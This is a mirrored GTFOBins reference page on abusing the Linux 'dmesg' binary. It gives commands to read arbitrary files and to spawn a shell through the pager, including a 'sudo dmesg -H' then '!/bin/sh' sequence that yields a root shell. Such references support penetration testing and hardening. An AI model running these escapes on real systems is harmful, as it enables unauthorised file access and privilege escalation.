1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 00:06:03 +02:00
GTFOBins.github.io/_gtfobins/dmesg.md
2020-03-15 12:51:02 +01:00

530 B

functions
file-read shell sudo
description code
This is not suitable for binary files. LFILE=file_to_read dmesg -rF "$LFILE"
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. dmesg -H !/bin/sh
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. sudo dmesg -H !/bin/sh